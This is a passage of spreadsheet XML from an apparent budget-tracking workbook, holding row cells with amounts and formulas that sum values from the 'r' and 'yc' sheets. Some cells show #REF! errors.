        <f>H70+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J70" s="194"/>
      <c r="K70" s="194">
        <f>J70+'r'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L60</f>
        <v>0</v>
      </c>
      <c r="M70" s="194"/>
      <c r="N70" s="320"/>
      <c r="O70" s="208"/>
      <c r="P70" s="193" t="s">
        <v>314</v>
      </c>
      <c r="Q70" s="337"/>
      <c r="R70" s="338"/>
      <c r="S70" s="338"/>
      <c r="T70" s="338"/>
      <c r="U70" s="338"/>
      <c r="V70" s="338"/>
      <c r="W70" s="338"/>
      <c r="X70" s="338"/>
      <c r="Y70" s="338"/>
      <c r="Z70" s="339"/>
    </row>
    <row r="71" ht="15.75" customHeight="1" spans="1:26">
      <c r="A71" s="191" t="s">
        <v>319</v>
      </c>
      <c r="B71" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C71" s="193"/>
      <c r="D71" s="193"/>
      <c r="E71" s="194">
        <v>104000</v>
      </c>
      <c r="F71" s="194"/>
      <c r="G71" s="225"/>
      <c r="H71" s="194">
        <f>G71+'r'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I61</f>
        <v>1115873</v>
      </c>
      <c r="J71" s="194"/>
      <c r="K71" s="194">
        <f>J71+'r'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L61</f>
        <v>1101160.08</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="320">
        <f>M71/52000*100</f>
        <v>0</v>
      </c>
      <c r="O71" s="208"/>
      <c r="P71" s="193"/>
      <c r="Q71" s="340"/>
      <c r="R71" s="341"/>
      <c r="S71" s="341"/>
      <c r="T71" s="341"/>
      <c r="U71" s="341"/>
      <c r="V71" s="341"/>
      <c r="W71" s="341"/>
      <c r="X71" s="341"/>
      <c r="Y71" s="341"/>
      <c r="Z71" s="342"/>
    </row>
    <row r="72" ht="15.75" customHeight="1" spans="1:26">
      <c r="A72" s="191"/>
      <c r="B72" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C72" s="193"/>
      <c r="D72" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E72" s="194"/>
      <c r="F72" s="194"/>
      <c r="G72" s="225"/>
      <c r="H72" s="194">
        <f>G72+'r'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I62</f>
        <v>835993.456</v>
      </c>
      <c r="J72" s="194"/>
      <c r="K72" s="194">
        <f>J72+'r'!K72</f>
        <v>0</v>
      </c>
      <c r="L72" s="194">
        <f>K72+yc!L62</f>
        <v>834472.796</v>
      </c>
      <c r="M72" s="194"/>
      <c r="N72" s="320">
        <f>M72/25000*100</f>
        <v>0</v>
      </c>
      <c r="O72" s="208"/>
      <c r="P72" s="193"/>
      <c r="Q72" s="343"/>
      <c r="R72" s="344"/>
      <c r="S72" s="344"/>
      <c r="T72" s="344"/>
      <c r="U72" s="344"/>
      <c r="V72" s="344"/>
      <c r="W72" s="344"/>
      <c r="X72" s="344"/>
      <c r="Y72" s="344"/>
      <c r="Z72" s="345"/>
    </row>
    <row r="73" ht="15.75" customHeight="1" spans="1:26">
      <c r="A73" s="191"/>
      <c r="B73" s="193"/>
      <c r="C73" s="193"/>
      <c r="D73" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E73" s="194"/>
      <c r="F73" s="194"/>
      <c r="G73" s="225"/>
      <c r="H73" s="194">
        <f>G73+'r'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'r'!K73</f>
        <v>0</v>
      </c>
      <c r="L73" s="194">
        <f>K73+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M73" s="194"/>
      <c r="N73" s="320"/>
      <c r="O73" s="208"/>
      <c r="P73" s="193" t="s">
        <v>315</v>
      </c>
      <c r="Q73" s="337"/>
      <c r="R73" s="338"/>
      <c r="S73" s="338"/>
      <c r="T73" s="338"/>
      <c r="U73" s="338"/>
      <c r="V73" s="338"/>
      <c r="W73" s="338"/>
      <c r="X73" s="338"/>
      <c r="Y73" s="338"/>
      <c r="Z73" s="339"/>
    </row>
    <row r="74" ht="15.75" customHeight="1" spans="1:26">
      <c r="A74" s="191"/>
      <c r="B74" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C74" s="193"/>
      <c r="D74" s="193"/>
      <c r="E74" s="194">
        <f>E75</f>
        <v>123000</v>
      </c>
      <c r="F74" s="194"/>
      <c r="G74" s="225"/>
      <c r="H74" s="194">
        <f>G74+'r'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J74" s="194">
        <f>J75</f>
        <v>0</v>
      </c>
      <c r="K74" s="194">
        <f>J74+'r'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L64</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="320"/>
      <c r="O74" s="208"/>
      <c r="P74" s="193"/>
      <c r="Q74" s="340"/>
      <c r="R74" s="341"/>
      <c r="S74" s="341"/>
      <c r="T74" s="341"/>
      <c r="U74" s="341"/>
      <c r="V74" s="341"/>
      <c r="W74" s="341"/>
      <c r="X74" s="341"/>
      <c r="Y74" s="341"/>
      <c r="Z74" s="342"/>
    </row>
    <row r="75" ht="15.75" customHeight="1" spans="1:26">
      <c r="A75" s="191"/>
      <c r="B75" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C75" s="193"/>
      <c r="D75" s="193"/>
      <c r="E75" s="194">
        <f>SUM(E76:E77)</f>
        <v>123000</v>
      </c>
      <c r="F75" s="194"/>
      <c r="G75" s="225"/>
      <c r="H75" s="194">
        <f>G75+'r'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J75" s="194">
        <f>SUM(J76:J77)</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'r'!K75</f>
        <v>0</v>
      </c>
      <c r="L75" s="194">
        <f>K75+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M75" s="194"/>
      <c r="N75" s="320"/>
      <c r="O75" s="208"/>
      <c r="P75" s="193"/>
      <c r="Q75" s="343"/>
      <c r="R75" s="344"/>
      <c r="S75" s="344"/>
      <c r="T75" s="344"/>
      <c r="U75" s="344"/>
      <c r="V75" s="344"/>
      <c r="W75" s="344"/>
      <c r="X75" s="344"/>
      <c r="Y75" s="344"/>
      <c r="Z75" s="345"/>
    </row>
    <row r="76" ht="15.75" customHeight="1" spans="1:26">
      <c r="A76" s="191"/>
      <c r="B76" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C76" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D76" s="193"/>
      <c r="E76" s="194">
        <v>25000</v>
      </c>
      <c r="F76" s="194"/>
      <c r="G76" s="194"/>
      <c r="H76" s="194">
        <f>G76+'r'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J76" s="194"/>
      <c r="K76" s="194">
        <f>J76+'r'!K76</f>
        <v>0</v>
      </c>
      <c r="L76" s="194">
        <f>K76+yc!L66</f>
        <v>0</v>
      </c>
      <c r="M76" s="194"/>
      <c r="N76" s="320"/>
      <c r="O76" s="208"/>
      <c r="P76" s="193" t="s">
        <v>319</v>
      </c>
      <c r="Q76" s="337"/>
      <c r="R76" s="338"/>
      <c r="S76" s="338"/>
      <c r="T76" s="338"/>
      <c r="U76" s="338"/>
      <c r="V76" s="338"/>
      <c r="W76" s="338"/>
      <c r="X76" s="338"/>
      <c r="Y76" s="338"/>
      <c r="Z76" s="339"/>
    </row>
    <row r="77" ht="15.75" customHeight="1" spans="1:26">
      <c r="A77" s="191"/>
      <c r="B77" s="191"/>
      <c r="C77" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D77" s="193"/>
      <c r="E77" s="194">
        <v>98000</v>
      </c>
      <c r="F77" s="277"/>
      <c r="G77" s="194"/>
      <c r="H77" s="194">
        <f>G77+'r'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J77" s="194"/>
      <c r="K77" s="194">
        <f>J77+'r'!K77</f>
        <v>0</v>
      </c>
      <c r="L77" s="194">
        <f>K77+yc!L67</f>
        <v>0</v>
      </c>
      <c r="M77" s="194"/>
      <c r="N77" s="320"/>
      <c r="O77" s="208"/>
      <c r="P77" s="193"/>
      <c r="Q77" s="340"/>
      <c r="R77" s="341"/>
      <c r="S77" s="341"/>
      <c r="T77" s="341"/>
      <c r="U77" s="341"/>
      <c r="V77" s="341"/>
      <c r="W77" s="341"/>
      <c r="X77" s="341"/>
      <c r="Y77" s="341"/>
      <c r="Z77" s="342"/>
    </row>
    <row r="78" ht="15.75" customHeight="1" spans="1:26">
      <c r="A78" s="346" t="s">
        <v>320</v>
      </c>
      <c r="B78" s="347" t="s">
        <v>227</v>
      </c>
      <c r="C78" s="347"/>
      <c r="D78" s="347"/>
      <c r="E78" s="348">
        <v>34000</v>
      </c>
      <c r="F78" s="348"/>
      <c r="G78" s="348"/>
      <c r="H78" s="194">
        <f>G78+'r'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194" t="e">
        <f>H78+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J78" s="348"/>
      <c r="K78" s="194">
        <f>J78+'r'!K78</f>
        <v>0</v>
      </c>
      <c r="L78" s="194" t="e">
        <f>K78+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M78" s="348"/>
      <c r="N78" s="349">
        <f>M78/27000*100</f>
        <v>0</v>
      </c>
      <c r="O78" s="208"/>
      <c r="P78" s="193"/>
      <c r="Q78" s="343"/>
      <c r="R78" s="344"/>
      <c r="S78" s="344"/>
      <c r="T78" s="344"/>
      <c r="U78" s="344"/>
      <c r="V78" s="344"/>
      <c r="W78" s="344"/>
      <c r="X78" s="344"/>
      <c r="Y78" s="344"/>
      <c r="Z78" s="345"/>
    </row>
    <row r="79" ht="15.75" customHeight="1" spans="1:26">
      <c r="A79" s="346"/>
      <c r="B79" s="347" t="s">
        <v>283</v>
      </c>
      <c r="C79" s="347"/>
      <c r="D79" s="350" t="s">
        <v>250</v>
      </c>
      <c r="E79" s="348"/>
      <c r="F79" s="348"/>
      <c r="G79" s="348"/>
      <c r="H79" s="194">
        <f>G79+'r'!H79</f>
        <v>0</v>
      </c>
      <c r="I79" s="194" t="e">
        <f>H79+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J79" s="348"/>
      <c r="K79" s="194">
        <f>J79+'r'!K79</f>
        <v>0</v>
      </c>
      <c r="L79" s="194" t="e">
        <f>K79+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M79" s="348"/>
      <c r="N79" s="351">
        <f>M79/14000*100</f>
        <v>0</v>
      </c>
      <c r="O79" s="208"/>
      <c r="P79" s="193" t="s">
        <v>320</v>
      </c>
      <c r="Q79" s="337"/>
      <c r="R79" s="338"/>
      <c r="S79" s="338"/>
      <c r="T79" s="338"/>
      <c r="U79" s="338"/>
      <c r="V79" s="338"/>
      <c r="W79" s="338"/>
      <c r="X79" s="338"/>
      <c r="Y79" s="338"/>
      <c r="Z79" s="339"/>
    </row>
    <row r="80" ht="15.75" customHeight="1" spans="1:26">
      <c r="A80" s="346"/>
      <c r="B80" s="347"/>
      <c r="C80" s="347"/>
      <c r="D80" s="347" t="s">
        <v>284</v>
      </c>
      <c r="E80" s="348"/>
      <c r="F80" s="348"/>
      <c r="G80" s="348"/>
      <c r="H80" s="194">
        <f>G80+'r'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="194" t="e">
        <f>H80+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J80" s="348"/>
      <c r="K80" s="194">
        <f>J80+'r'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="194" t="e">
        <f>K80+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M80" s="348"/>
      <c r="N80" s="351"/>
      <c r="O80" s="208"/>
      <c r="P80" s="193"/>
      <c r="Q80" s="340"/>
      <c r="R80" s="341"/>
      <c r="S80" s="341"/>
      <c r="T80" s="341"/>
      <c r="U80" s="341"/>
      <c r="V80" s="341"/>
      <c r="W80" s="341"/>
      <c r="X80" s="341"/>
      <c r="Y80" s="341"/>
      <c r="Z80" s="342"/>
    </row>
    <row r="81" ht="15.75" customHeight="1" spans="1:26">
      <c r="A81" s="346"/>
      <c r="B81" s="347" t="s">
        <v>253</v>
      </c>
      <c r="C81" s="347"/>
      <c r="D81" s="347"/>
      <c r="E81" s="348">
        <f>E82</f>
        <v>32000</v>
      </c>
      <c r="F81" s="348"/>
      <c r="G81" s="348"/>
      <c r="H81" s="194">
        <f>G81+'r'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="194" t="e">
        <f>H81+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J81" s="348">
        <f>J82</f>
        <v>0</v>
      </c>
      <c r="K81" s="194">
        <f>J81+'r'!K81</f>
        <v>0</v>
      </c>
      <c r="L81" s="194" t="e">
        <f>K81+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M81" s="348"/>
      <c r="N81" s="351"/>
      <c r="O81" s="208"/>
      <c r="P81" s="193"/>
      <c r="Q81" s="343"/>
      <c r="R81" s="344"/>
      <c r="S81" s="344"/>
      <c r="T81" s="344"/>
      <c r="U81" s="344"/>
      <c r="V81" s="344"/>
      <c r="W81" s="344"/>
      <c r="X81" s="344"/>
      <c r="Y81" s="344"/>
      <c r="Z81" s="345"/>
    </row>
    <row r="82" ht="15.75" customHeight="1" spans="1:26">
      <c r="A82" s="346"/>
      <c r="B82" s="347" t="s">
        <v>254</v>
      </c>
      <c r="C82" s="347"/>
      <c r="D82" s="347"/>
      <c r="E82" s="348">
        <f>SUM(E83:E84)</f>
        <v>32000</v>
      </c>
      <c r="F82" s="348"/>
      <c r="G82" s="348"/>
      <c r="H82" s="194">
        <f>G82+'r'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="194" t="e">
        <f>H82+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J82" s="348">
        <f>SUM(J83:J84)</f>
        <v>0</v>
      </c>
      <c r="K82" s="194">
        <f>J82+'r'!K82</f>
        <v>0</v>
      </c>
      <c r="L82" s="194" t="e">
        <f>K82+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M82" s="348"/>
      <c r="N82" s="351"/>
      <c r="O82" s="208"/>
      <c r="P82" s="193" t="s">
        <v>321</v>
      </c>
      <c r="Q82" s="337"/>
      <c r="R82" s="338"/>
      <c r="S82" s="338"/>
      <c r="T82" s="338"/>
      <c r="U82" s="338"/>
      <c r="V82" s="338"/>
      <c r="W82" s="338"/>
      <c r="X82" s="338"/>
      <c r="Y82" s="338"/>
      <c r="Z82" s="339"/>
    </row>
    <row r="83" ht="15.75" customHeight="1" spans="1:26">
      <c r="A83" s="346"/>
      <c r="B83" s="346" t="s">
        <v>231</v>
      </c>
      <c r="C83" s="347" t="s">
        <v>257</v>
      </c>
      <c r="D83" s="347"/>
      <c r="E83" s="348">
        <v>12000</v>
      </c>
      <c r="F83" s="348"/>
      <c r="G83" s="348"/>
      <c r="H83" s="194">
        <f>G83+'r'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="194" t="e">
        <f>H83+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J83" s="348"/>
      <c r="K83" s="194">
        <f>J83+'r'!K83</f>
        <v>0</v>
      </c>
      <c r="L83" s="194" t="e">
        <f>K83+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M83" s="348"/>
      <c r="N83" s="351"/>
      <c r="O83" s="208"/>
      <c r="P83" s="193"/>
      <c r="Q83" s="340"/>
      <c r="R83" s="341"/>
      <c r="S83" s="341"/>
      <c r="T83" s="341"/>
      <c r="U83" s="341"/>
      <c r="V83" s="341"/>
      <c r="W83" s="341"/>
      <c r="X83" s="341"/>
      <c r="Y83" s="341"/>
      <c r="Z83" s="342"/>
    </row>
    <row r="84" ht="15.75" customHeight="1" spans="1:26">
      <c r="A84" s="346"/>
      <c r="B84" s="346"/>
      <c r="C84" s="347" t="s">
        <v>259</v>
      </c>
      <c r="D84" s="347"/>
      <c r="E84" s="348">
        <v>20000</v>
      </c>
      <c r="F84" s="348"/>
      <c r="G84" s="352"/>
      <c r="H84" s="194">
        <f>G84+'r'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="194" t="e">
        <f>H84+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J84" s="348"/>
      <c r="K84" s="194">
        <f>J84+'r'!K84</f>
        <v>0</v>
      </c>
      <c r="L84" s="194" t="e">
        <f>K84+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M84" s="348"/>
      <c r="N84" s="351"/>
      <c r="O84" s="196" t="s">
        <v>286</v>
      </c>
      <c r="P84" s="193"/>
      <c r="Q84" s="343"/>
      <c r="R84" s="344"/>
      <c r="S84" s="344"/>
      <c r="T84" s="344"/>
      <c r="U84" s="344"/>
      <c r="V84" s="344"/>
      <c r="W84" s="344"/>
      <c r="X84" s="344"/>
      <c r="Y84" s="344"/>
      <c r="Z84" s="345"/>
    </row>
    <row r="85" ht="15.75" customHeight="1" spans="1:26">
      <c r="A85" s="191" t="s">
        <v>321</v>
      </c>
      <c r="B85" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C85" s="193"/>
      <c r="D85" s="193"/>
      <c r="E85" s="194">
        <v>57000</v>
      </c>
      <c r="F85" s="194"/>
      <c r="G85" s="194"/>
      <c r="H85" s="194">
        <f>G85+'r'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="194">
        <f>H85+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J85" s="194"/>
      <c r="K85" s="194">
        <f>J85+'r'!K85</f>
        <v>0</v>
      </c>
      <c r="L85" s="194">
        <f>K85+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M85" s="194"/>
      <c r="N85" s="320">
        <f>M85/50000*100</f>
        <v>0</v>
      </c>
      <c r="O85" s="199"/>
      <c r="P85" s="193" t="s">
        <v>330</v>
      </c>
      <c r="Q85" s="337"/>
      <c r="R85" s="338"/>
      <c r="S85" s="338"/>
      <c r="T85" s="338"/>
      <c r="U85" s="338"/>
      <c r="V85" s="338"/>
      <c r="W85" s="338"/>
      <c r="X85" s="338"/>
      <c r="Y85" s="338"/>
      <c r="Z85" s="339"/>
    </row>
    <row r="86" ht="15.75" customHeight="1" spans="1:26">
      <c r="A86" s="191"/>
      <c r="B86" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C86" s="193"/>
      <c r="D86" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E86" s="194"/>
      <c r="F86" s="194"/>
      <c r="G86" s="194"/>
      <c r="H86" s="194">
        <f>G86+'r'!H86</f>
        <v>0</v>
      </c>
      <c r="I86" s="194">
        <f>H86+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J86" s="194"/>
      <c r="K86" s="194">
        <f>J86+'r'!K86</f>
        <v>0</v>
      </c>
      <c r="L86" s="194">
        <f>K86+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M86" s="194"/>
      <c r="N86" s="320">
        <f>M86/50000*100</f>
        <v>0</v>
      </c>
      <c r="O86" s="199"/>
      <c r="P86" s="193"/>
      <c r="Q86" s="340"/>
      <c r="R86" s="341"/>
      <c r="S86" s="341"/>
      <c r="T86" s="341"/>
      <c r="U86" s="341"/>
      <c r="V86" s="341"/>
      <c r="W86" s="341"/>
      <c r="X86" s="341"/>
      <c r="Y86" s="341"/>
      <c r="Z86" s="342"/>
    </row>
    <row r="87" ht="15.75" customHeight="1" spans="1:26">
      <c r="A87" s="191"/>
      <c r="B87" s="193"/>
      <c r="C87" s="193"/>
      <c r="D87" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E87" s="194"/>
      <c r="F87" s="194"/>
      <c r="G87" s="194"/>
      <c r="H87" s="194">
        <f>G87+'r'!H87</f>
        <v>0</v>
      </c>
      <c r="I87" s="194">
        <f>H87+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J87" s="194"/>
      <c r="K87" s="194">
        <f>J87+'r'!K87</f>
        <v>0</v>
      </c>
      <c r="L87" s="194">
        <f>K87+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M87" s="194"/>
      <c r="N87" s="320"/>
      <c r="O87" s="199"/>
      <c r="P87" s="193"/>
      <c r="Q87" s="343"/>
      <c r="R87" s="344"/>
      <c r="S87" s="344"/>
      <c r="T87" s="344"/>
      <c r="U87" s="344"/>
      <c r="V87" s="344"/>
      <c r="W87" s="344"/>
      <c r="X87" s="344"/>
      <c r="Y87" s="344"/>
      <c r="Z87" s="345"/>
    </row>
    <row r="88" ht="15.75" customHeight="1" spans="1:26">
      <c r="A88" s="191"/>
      <c r="B88" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C88" s="193"/>
      <c r="D88" s="193"/>
      <c r="E88" s="194">
        <f>E89</f>
        <v>55000</v>
      </c>
      <c r="F88" s="194"/>
      <c r="G88" s="194"/>
      <c r="H88" s="194">
        <f>G88+'r'!H88</f>
        <v>0</v>
      </c>
      <c r="I88" s="194">
        <f>H88+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J88" s="194">
        <f>J89</f>
        <v>0</v>
      </c>
      <c r="K88" s="194">
        <f>J88+'r'!K88</f>
        <v>0</v>
      </c>
      <c r="L88" s="194">
        <f>K88+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M88" s="194"/>
      <c r="N88" s="320"/>
      <c r="O88" s="199"/>
      <c r="P88" s="246"/>
      <c r="Q88" s="353"/>
      <c r="R88" s="353"/>
      <c r="S88" s="353"/>
      <c r="T88" s="353"/>
      <c r="U88" s="353"/>
      <c r="V88" s="353"/>
      <c r="W88" s="353"/>
      <c r="X88" s="353"/>
      <c r="Y88" s="353"/>
      <c r="Z88" s="354"/>
    </row>
    <row r="89" ht="15.75" customHeight="1" spans="1:26">
      <c r="A89" s="191"/>
      <c r="B89" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C89" s="193"/>
      <c r="D89" s="193"/>
      <c r="E89" s="194">
        <f>SUM(E90:E91)</f>
        <v>55000</v>
      </c>
      <c r="F89" s="194"/>
      <c r="G89" s="194"/>
      <c r="H89" s="194">
        <f>G89+'r'!H89</f>
        <v>0</v>
      </c>
      <c r="I89" s="194">
        <f>H89+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J89" s="194">
        <f>SUM(J90:J91)</f>
        <v>0</v>
      </c>
      <c r="K89" s="194">
        <f>J89+'r'!K89</f>
        <v>0</v>
      </c>
      <c r="L89" s="194">
        <f>K89+yc!L72</f>
        <v>0</v>
      </c>
      <c r="M89" s="194"/>
      <c r="N89" s="320"/>
      <c r="O89" s="199"/>
      <c r="P89" s="355"/>
      <c r="Q89" s="298"/>
      <c r="R89" s="298"/>
      <c r="S89" s="298"/>
      <c r="T89" s="298"/>
      <c r="U89" s="298"/>
      <c r="V89" s="298"/>
      <c r="W89" s="298"/>
      <c r="X89" s="298"/>
      <c r="Y89" s="298"/>
      <c r="Z89" s="356"/>
    </row>
    <row r="90" ht="15.75" customHeight="1" spans="1:26">
      <c r="A90" s="191"/>
      <c r="B90" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C90" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D90" s="193"/>
      <c r="E90" s="194">
        <v>15000</v>
      </c>
      <c r="F90" s="194"/>
      <c r="G90" s="194"/>
      <c r="H90" s="194">
        <f>G90+'r'!H90</f>
        <v>0</v>
      </c>
      <c r="I90" s="194">
        <f>H90+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J90" s="194"/>
      <c r="K90" s="194">
        <f>J90+'r'!K90</f>
        <v>0</v>
      </c>
      <c r="L90" s="194">
        <f>K90+yc!L73</f>
        <v>0</v>
      </c>
      <c r="M90" s="194"/>
      <c r="N90" s="320"/>
      <c r="O90" s="199"/>
      <c r="P90" s="355"/>
      <c r="Q90" s="298"/>
      <c r="R90" s="298"/>
      <c r="S90" s="298"/>
      <c r="T90" s="298"/>
      <c r="U90" s="298"/>
      <c r="V90" s="298"/>
      <c r="W90" s="298"/>
      <c r="X90" s="298"/>
      <c r="Y90" s="298"/>
      <c r="Z90" s="356"/>
    </row>
    <row r="91" ht="15.75" customHeight="1" spans="1:26">
      <c r="A91" s="191"/>
      <c r="B91" s="191"/>
      <c r="C91" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D91" s="193"/>
      <c r="E91" s="194">
        <v>40000</v>
      </c>
      <c r="F91" s="194"/>
      <c r="G91" s="194"/>
      <c r="H91" s="194">
        <f>G91+'r'!H91</f>
        <v>0</v>
      </c>
      <c r="I91" s="194">
        <f>H91+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J91" s="194"/>
      <c r="K91" s="194">
        <f>J91+'r'!K91</f>
        <v>0</v>
      </c>
      <c r="L91" s="194">
        <f>K91+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M91" s="194"/>
      <c r="N91" s="320"/>
      <c r="O91" s="199"/>
      <c r="P91" s="355"/>
      <c r="Q91" s="298"/>
      <c r="R91" s="298"/>
      <c r="S91" s="298"/>
      <c r="T91" s="298"/>
      <c r="U91" s="298"/>
      <c r="V91" s="298"/>
      <c r="W91" s="298"/>
      <c r="X91" s="298"/>
      <c r="Y91" s="298"/>
      <c r="Z91" s="356"/>
    </row>
    <row r="92" spans="1:26">
      <c r="A92" s="282" t="s">
        <v>287</v>
      </c>
      <c r="B92" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C92" s="193"/>
      <c r="D92" s="193"/>
      <c r="E92" s="241"/>
      <c r="F92" s="241"/>
      <c r="G92" s="241"/>
      <c r="H92" s="241"/>
      <c r="I92" s="194">
        <f>H92+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J92" s="241"/>
      <c r="K92" s="241"/>
      <c r="L92" s="194">
        <f>K92+yc!L75</f>
        <v>0</v>
      </c>
      <c r="M92" s="241"/>
      <c r="N92" s="241"/>
      <c r="O92" s="199"/>
      <c r="P92" s="355"/>
      <c r="Q92" s="298"/>
      <c r="R92" s="298"/>
      <c r="S92" s="298"/>
      <c r="T92" s="298"/>
      <c r="U92" s="298"/>
      <c r="V92" s="298"/>
      <c r="W92" s="298"/>
      <c r="X92" s="298"/>
      <c r="Y92" s="298"/>
      <c r="Z92" s="356"/>
    </row>
    <row r="93" spans="1:26">
      <c r="A93" s="287"/>
      <c r="B93" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C93" s="193"/>
      <c r="D93" s="193"/>
      <c r="E93" s="241"/>
      <c r="F93" s="241"/>
      <c r="G93" s="241"/>
      <c r="H93" s="241"/>
      <c r="I93" s="194">
        <f>H93+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J93" s="241"/>
      <c r="K93" s="241"/>
      <c r="L93" s="194">
        <f>K93+yc!L76</f>
        <v>0</v>
      </c>
      <c r="M93" s="241"/>
      <c r="N93" s="241"/>
      <c r="O93" s="199"/>
      <c r="P93" s="355"/>
      <c r="Q93" s="298"/>
      <c r="R93" s="298"/>
      <c r="S93" s="298"/>
      <c r="T93" s="298"/>
      <c r="U93" s="298"/>
      <c r="V93" s="298"/>
      <c r="W93" s="298"/>
      <c r="X93" s="298"/>
      <c r="Y93" s="298"/>
      <c r="Z93" s="356"/>
    </row>
    <row r="94" spans="1:26">
      <c r="A94" s="287"/>
      <c r="B94" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C94" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D94" s="193"/>
      <c r="E94" s="241"/>
      <c r="F94" s="241"/>
      <c r="G94" s="241"/>
      <c r="H94" s="241"/>
      <c r="I94" s="194">
        <f>H94+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J94" s="241"/>
      <c r="K94" s="241"/>
      <c r="L94" s="194">
        <f>K94+yc!L77</f>
        <v>0</v>
      </c>
      <c r="M94" s="241"/>
      <c r="N94" s="241"/>
      <c r="O94" s="199"/>
      <c r="P94" s="355"/>
      <c r="Q94" s="298"/>
      <c r="R94" s="298"/>
      <c r="S94" s="298"/>
      <c r="T94" s="298"/>
      <c r="U94" s="298"/>
      <c r="V94" s="298"/>
      <c r="W94" s="298"/>
      <c r="X94" s="298"/>
      <c r="Y94" s="298"/>
      <c r="Z94" s="356"/>
    </row>
    <row r="95" spans="1:26">
      <c r="A95" s="287"/>
      <c r="B95" s="191"/>
      <c r="C95" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D95" s="193"/>
      <c r="E95" s="241"/>
      <c r="F95" s="241"/>
      <c r="G95" s="241"/>
      <c r="H95" s="241"/>
      <c r="I95" s="194">
        <f>H95+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J95" s="241"/>
      <c r="K95" s="241"/>
      <c r="L95" s="194">
        <f>K95+yc!L78</f>
        <v>0</v>
      </c>
      <c r="M95" s="241"/>
      <c r="N95" s="241"/>
      <c r="O95" s="327"/>
      <c r="P95" s="357"/>
      <c r="Q95" s="308"/>
      <c r="R95" s="308"/>
      <c r="S95" s="308"/>
      <c r="T95" s="308"/>
      <c r="U95" s="308"/>
      <c r="V95" s="308"/>
      <c r="W95" s="308"/>
      <c r="X95" s="308"/>
      <c r="Y95" s="308"/>
